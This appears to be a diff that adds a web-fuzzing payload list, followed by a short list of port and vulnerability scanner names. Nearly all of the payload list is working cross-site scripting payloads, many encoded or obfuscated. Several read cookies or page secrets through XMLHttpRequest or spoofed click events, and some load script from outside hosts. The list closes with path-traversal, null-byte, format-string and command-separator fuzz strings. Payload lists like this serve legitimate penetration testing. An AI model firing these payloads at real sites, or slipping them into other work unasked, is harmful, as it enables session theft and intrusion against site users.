+<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>
+<script>%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true});%20</script>
+<script>%20var+MouseEvent=function+MouseEvent(){};%20MouseEvent=MouseEvent%20var+test=new+MouseEvent();%20test.isTrusted=true;%20test.type='click';%20%20document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());}%20document.getElementById(%22safe123%22).click(test);%20</script>
+<script>%20%20(function%20(o)%20{%20%20%20function%20exploit(x)%20{%20%20%20%20if%20(x%20!==%20null)%20%20%20%20%20alert('User%20cookie%20is%20'%20%2B%20x);%20%20%20%20else%20%20%20%20%20console.log('fail');%20%20%20}%20%20%20%20%20%20o.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__('isTrusted',%20function%20()%20{%20return%20true;%20});%20%20%20%20exploit(Safe.get());%20%20%20};%20%20%20%20%20%20var%20e%20=%20document.createEvent('MouseEvent');%20%20%20e.initEvent('click',%20true,%20true);%20%20%20o.dispatchEvent(e);%20%20})(document.getElementById('safe123'));%20</script>
+<iframe%20src=/%20onload=eval(unescape(this.name.replace(/\/g,null)))%20name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
+<script>%20%20%20%20%20function%20b()%20{%20return%20Safe.get();%20}%20alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true}));%20</script>%20
+<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=alert(this.ownerDocument.cookie)%20width=0%20height=%200%20/>%20#
+<script>%20%20function%20foo(elem,%20doc,%20text)%20{%20%20%20elem.onclick%20=%20function%20(e)%20{%20%20%20%20e.__defineGetter__(text[0],%20function%20()%20{%20return%20true%20})%20%20%20%20alert(Safe.get());%20%20%20};%20%20%20%20%20%20var%20event%20=%20doc.createEvent(text[1]);%20%20%20event.initEvent(text[2],%20true,%20true);%20%20%20elem.dispatchEvent(event);%20%20}%20</script>%20<img%20src=http://www.google.fr/images/srpr/logo3w.png%20onload=foo(this,this.ownerDocument,this.name.split(/,/))%20name=isTrusted,MouseEvent,click%20width=0%20height=0%20/>%20#%20
+<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
+<script>%20var+xmlHttp+=+null;%20try+{%20xmlHttp+=+new+XMLHttpRequest();%20}+catch(e)+{}%20if+(xmlHttp)+{%20xmlHttp.open('GET',+'/xssme2',+true);%20xmlHttp.onreadystatechange+=+function+()+{%20if+(xmlHttp.readyState+==+4)+{%20xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi);%20alert(RegExp.%241);%20}%20}%20xmlHttp.send(null);%20};%20</script>#
+<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
+<script%20for=document%20event=onreadystatechange>getElementById('safe123').click()</script>
+<script>%20var+x+=+showModelessDialog+(this);%20alert(x.document.cookie);%20</script>
+<script>%20location.href%20=%20'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=';%20</script>
+<iframe%20src=%22404%22%20onload=%22frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe%20src=%22404%22%20onload=%22content.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe%20src=%22404%22%20onload=%22self.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<iframe%20src=%22404%22%20onload=%22top.frames[0].document.write(%26quot;<script>r=new%20XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
+<script>var%20x%20=%20safe123.onclick;safe123.onclick%20=%20function(event)%20{var%20f%20=%20false;var%20o%20=%20{%20isTrusted:%20true%20};var%20a%20=%20[event,%20o,%20event];var%20get;event.__defineGetter__('type',%20function()%20{get%20=%20arguments.callee.caller.arguments.callee;return%20'click';});var%20_alert%20=%20alert;alert%20=%20function()%20{%20alert%20=%20_alert%20};x.apply(null,%20a);(function()%20{arguments.__defineGetter__('0',%20function()%20{%20return%20a.pop();%20});alert(get());})();};safe123.click();</script>#
+<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<textarea%20id=ta%20onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;)%20autofocus></textarea>
+<iframe%20onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var%20xhr%20=%20new%20XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+<textarea%20id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20id=iframe%20src=%22javascript:parent.x(window)%22><iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+<textarea%20id=ta%20onfocus=%22write('<script>alert(1)</script>')%22%20autofocus></textarea>
+<object%20data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
+<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20};%20open(%22javascript:opener.x(window)%22)</script>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'http://xssme.html5sec.org/xssme2',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
+<iframe%20src=`http://xssme.html5sec.org/?xss=<iframe%20onload=%22xhr=new%20XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
+<a%20target="x"%20href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
+<a%20target="x"%20href="xssme?xss=<script>var%20cl=Components;var%20fcc=String.fromCharCode;doc=cl.lookupMethod(top,%20fcc(100,111,99,117,109,101,110,116)%20)(%20);cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe%20src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b%20name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
+<a%20target="x"%20href="xssme?xss=<script>find('cookie');%20var%20doc%20=%20getSelection().getRangeAt(0).startContainer.ownerDocument;%20console.log(doc);%20var%20xpe%20=%20new%20XPathEvaluator();%20var%20nsResolver%20=%20xpe.createNSResolver(doc);%20var%20result%20=%20xpe.evaluate('//script/text()',%20doc,%20nsResolver,%200,%20null);%20alert(result.iterateNext().data.match(/cookie%20=%20'(.*?)'/)[1])</script>
+<a%20target="x"%20href="xssme?xss=<script>function%20x(window)%20{%20eval(location.hash.substr(1))%20}</script><iframe%20src=%22javascript:parent.x(window);%22></iframe>#var%20xhr%20=%20new%20window.XMLHttpRequest();xhr.open('GET',%20'.',%20true);xhr.onload%20=%20function()%20{%20alert(xhr.responseText.match(/cookie%20=%20'(.*?)'/)[1])%20};xhr.send();
+Garethy%20Salty%20Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(),%20'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>
+<a%20href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
+<div%20onmouseover='alert&lpar;1&rpar;'>DIV</div>
+<iframe%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20onmouseover="prompt(1)">
+<a%20href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
+<embed%20src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">%20?
+<object%20data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
+<var%20onmouseover="prompt(1)">On%20Mouse%20Over</var>?
+<a%20href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click%20Here</a>
+<img%20src="/"%20=_="%20title="onerror='prompt(1)'">
+<%<!--'%><script>alert(1);</script%20-->
+<script%20src="data:text/javascript,alert(1)"></script>
+<iframe/src%20\/\/onload%20=%20prompt(1)
+<iframe/onreadystatechange=alert(1)
+<svg/onload=alert(1)
+<input%20value=<><iframe/src=javascript:confirm(1)
+<input%20type="text"%20value=``<div/onmouseover='alert(1)'>X</div>
+http://www.<script>alert(1)</script%20.com
+<iframe%20%20src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>%20?
+<svg><script%20?>alert(1)
+<iframe%20%20src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img%20src=`xx:xx`onerror=alert(1)>
+<object%20type="text/x-scriptlet"%20data="http://jsfiddle.net/XLE63/%20"></object>
+<meta%20http-equiv="refresh"%20content="0;javascript&colon;alert(1)"/>?
+<math><a%20xlink:href="//jsfiddle.net/t846h/">click
+<embed%20code="http://businessinfo.co.uk/labs/xss/xss.swf"%20allowscriptaccess=always>?
+<svg%20contentScriptType=text/vbs><script>MsgBox+1
+<a%20href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
+<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061')%20worksinIE>
+<script>~'\u0061'%20;%20%20\u0074\u0068\u0072\u006F\u0077%20~%20\u0074\u0068\u0069\u0073.%20%20\u0061\u006C\u0065\u0072\u0074(~'\u0061')</script%20U+
+<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script%20a=\u0061%20&%20/=%2F
+<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script%20????????????
+<object%20data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
+<script>+-+-1-+-+alert(1)</script>
+<body/onload=&lt;!--&gt;&#10alert(1)>
+<script%20itworksinallbrowsers>/*<script*%20*/alert(1)</script%20?
+<img%20src%20?itworksonchrome?\/onerror%20=%20alert(1)???
+<svg><script>//&NewLine;confirm(1);</script%20</svg>
+<svg><script%20onlypossibleinopera:-)>%20alert(1)
+<a%20aa%20aaa%20aaaa%20aaaaa%20aaaaaa%20aaaaaaa%20aaaaaaaa%20%20aaaaaaaaa%20aaaaaaaaaa%20%20href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
+<script%20x>%20alert(1)%20</script%201=2
+<div/onmouseover='alert(1)'>%20style="x:">
+<--`<img/src=`%20onerror=alert(1)>%20--!>
+<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>%20?
+<div%20%20style="position:absolute;top:0;left:0;width:100%;height:100%"%20%20onmouseover="prompt(1)"%20onclick="alert(1)">x</button>?
+"><img%20src=x%20onerror=window.open('https://www.google.com/');>
+<form><button%20formaction=javascript&colon;alert(1)>CLICKME
+<math><a%20xlink:href="//jsfiddle.net/t846h/">click
+<object%20data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
+<iframe%20%20src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
+<a%20%20href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click%20%20Me</a>
+"><img%20src=x%20onerror=prompt(1);>
+!'
+!@#$%%^#$%#$@#$%$$@#$%^^**(()
+!@#0%^#0##018387@#0^^**(()
+"><script>"
+">xxx<P>yyy
+"\t"
+#
+#&apos;
+#'
+#xA
+#xA#xD
+#xD
+#xD#xA
+$NULL
+$null
+%
+%00
+%00/
+%01%02%03%04%0a%0d%0aADSF
+%0a
+%20
+%20|
+%2500
+%250a
+%2A
+%2C
+%2e%2e%2f
+%3C%3F
+%5C
+%5C/
+%60
+%7C
+&#10;
+&#10;&#13;
+&#13;
+&#13;&#10;
+&apos;
+&quot;;id&quot;
+(')
+*
+*&apos;
+*'
+*|
++%00
+-
+--
+-1
+-1.0
+-2
+-20
+-268435455
+..%%35%63
+..%%35c
+..%25%35%63
+..%255c
+..%5c
+..%bg%qf
+..%c0%af
+..%u2215
+..%u2216
+../
+..\
+/
+/%00/
+/%2A
+/&apos;
+/'
+0
+00
+0xfffffff
+1
+1.0
+2
+2147483647
+268435455
+65536
+;
+<%20%20script%20>%20<%20/%20script>
+<?
+?x=
+?x="
+?x=>
+?x=|
+@&apos;
+@'
+A
+ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
+FALSE
+NULL
+TRUE
+[&apos;]
+[']
+\
+\"blah
+\&apos;
+\'
+\0
+\00
+\00\00
+\00\00\00
+\0\0
+\0\0\0
+\\
+\\/
+\\\\*
+\\\\?\\
+\t
+^&apos;
+^'
+`
+id%00
+id%00|
+null
+something%00html
+{&apos;}
+{'}
+|
+}

src/target_list

@@ -0,0 +1,18 @@
+
+Port scanners:
+
+Nmap
+Angry IP Scanner
+Superscan
+NetScanTools
+Unicornscan
+
+Vuln. scanners:
+
+Carrier
+Nessus
+Metasploit pro
+Acunetix 
+Appscan
+Netsparker
+Grendel Scan